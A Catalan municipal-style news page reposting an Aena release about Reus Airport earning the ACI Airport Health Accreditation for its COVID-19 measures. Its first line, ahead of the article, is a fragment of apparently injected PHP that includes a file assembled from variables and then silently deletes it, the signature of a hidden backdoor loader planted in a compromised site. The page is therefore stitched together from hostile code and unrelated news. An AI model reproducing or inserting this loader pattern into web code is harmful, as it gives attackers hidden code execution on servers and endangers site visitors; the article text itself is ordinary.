");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L'Aeroport de Reus, acreditat com
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

L'Aeroport de Reus, acreditat com (13/07/2021)

L'Aeroport de Reus ha rebut la certificació de el programa d'Acreditació de Salut Aeroportuària de el Consell Internacional d'Aeroports (ACI), un programa que avalua el compliment de les mesures sanitàries recomanades per ACI, l'Organització d'Aviació Civil Internacional (OACI), l'EASA , el Centre Europeu de Prevenció i Control de Malalties (ECDC) i les guies de l'Organització Mundial de la Salut (OMS), i que es troben al seu torn alineades amb els objectius de el Pla de Recuperació Operativa desenvolupat a Aena des d'abril de 2020 i que està aplicant a tots els aeroports de la xarxa.

Airport Health Accreditation (AHA) demostra el compromís continu d'Aena amb les mesures adoptades per a la seguretat d'empleats i passatgers arran de la pandèmia, amb l'objectiu de tornar a recuperar la confiança dels viatgers en el transport aeri.

Al costat de l'Aeroport de Reus, també han obtingut l'acreditació dels aeroports de La Corunya, Internacional Regió de Múrcia, Almeria, Astúries, FGL Granada-Jaén, Jerez, Santiago-Rosalía de Castro, Seve Ballesteros-Santander, Vigo i Saragossa. En total són 30 els aeroports de la xarxa d'Aena que compten amb l'Airport Health Accreditation, entre ells els aeroports Josep Tarradellas Barcelona-el Prat i Girona-Costa Brava. La resta d'aeroports de la xarxa d'Aena es troben en procés final de tramitació.

Com ha publicat el Centre Europeu de Control i Prevenció de Malalties (ECDC) en el seu "guidelines for covid-19 testing and quarantine of air travellers", el transport aeri s'ha demostrat com un entorn de baixa prevalença de virus sumant menys de l'1% dels casos detectats de covid-19 i sense increment en la ràtio de transmissió.

Mesures per a tota la xarxa d'Aena: Mampares, neteja i desinfecció, senyalètica, ventilació, gel hidroalcohòlic, nous procediments operatius i elements contactless, entre d'altres

Els protocols i mesures s'apliquen en tots els aeroports de la xarxa d'Aena. Entre aquestes mesures, ACI ha certificat el reforç de la neteja i desinfecció en les instaŀlacions, el control dels aforaments màxims permesos i l'adaptació dels diferents processos operatius a la nova realitat.

Així mateix, ACI ha valorat la instaŀlació de mampares protectores (l'aeroport ha instaŀlat més de 45 mampares distribuïdes en diferents punts de les terminals: taulells de facturació, portes d'embarcament, filtres de seguretat, sales VIP, punts d'informació a l'passatger, etc. ); de senyalètica informativa mitjançant pantalles digitals, cartells i megafonia amb missatges d'ús de mascareta, distància personal, higiene de mans, etc., així com marques i petjades de distanciament social o anuŀlació de seients. Aena ha elaborat 84 nous missatges, que inclouen totes aquestes variacions en diferents idiomes, i s'han creat més de 400 adaptacions per als diferents espais de les infraestructures. A més, s'han instaŀlat 55 dispensadors de gel hidroalcohólico i altres elements contactless com aixetes (81 unitats noves) i saboneres automàtiques (49 unitats). El 100% dels eixugamans (31 unitats) disposen de filtres HEPA.

Sobre totes aquestes mesures Aena ha treballat i segueix treballant de forma constant en tots els seus aeroports per recuperar el trànsit de forma segura. El seu Pla de Recuperació Operativa inclou més de 100 mesures, entre les dirigides directament a passatgers, operatives i organitzatives.

Joan Crespo, director de l'Aeroport de Reus, assenyala que "amb aquesta certificació s'acredita als passatgers que l'aeroport ha adaptat les seves instaŀlacions per garantir la seva seguretat i que puguin tornar a volar amb confiança. L'aeroport està preparat per reprendre la seva funció de portal d'entrada a Catalunya i contribuir a la recuperació de l'turisme al Camp de Tarragona i les Terres de l'Ebre. "

AHA és el primer programa mundial concebut específicament per al sector aeroportuari a partir de la crisi de la COVID-19. L'acreditació ha estat atorgada després d'una acurada avaluació de les mesures i procediments sanitaris que Aena i les autoritats espanyoles han introduït en totes les àrees i processos de l'passatger.

Els passatgers poden consultar a la pàgina web d'Aena la informació actualitzada relativa a les mesures implantades en els aeroports, les recomanacions per al seu viatge (abans de dirigir-se a l'aeroport, un cop a la instaŀlació, a l'avió ia l'aeroport de destinació) i les restriccions vigents en els diferents territoris. Està disponible en www.infocovidaena.es.

Font: AENA

L'Aeroport de Reus, acreditat com

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona